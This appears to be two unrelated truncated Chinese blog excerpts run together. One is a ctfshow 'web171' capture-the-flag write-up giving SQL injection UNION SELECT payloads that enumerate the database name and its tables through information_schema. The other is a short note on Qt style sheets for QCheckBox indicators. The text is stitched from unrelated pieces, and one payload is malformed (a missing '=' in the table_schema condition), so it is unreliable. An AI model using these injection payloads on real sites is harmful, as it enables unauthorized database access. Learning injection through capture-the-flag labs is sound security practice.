web171
最简单的sql注入,先演示基本操作
payload:
-1 union select 1,2,database() -- //得到数据库名为ctfshow_web
-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schemactfshow_web -- //得到…
Qt Style Sheets are a powerful mechanism that allows you to customize the appearance of widgets . 简述
QCheckBox支持盒子模型。子控件::indicator可以定义指示器样式。默认情况下指示器在内容矩形框的左上角。属性spacing指定指示器和文本之间的间距。
效果 样式表
…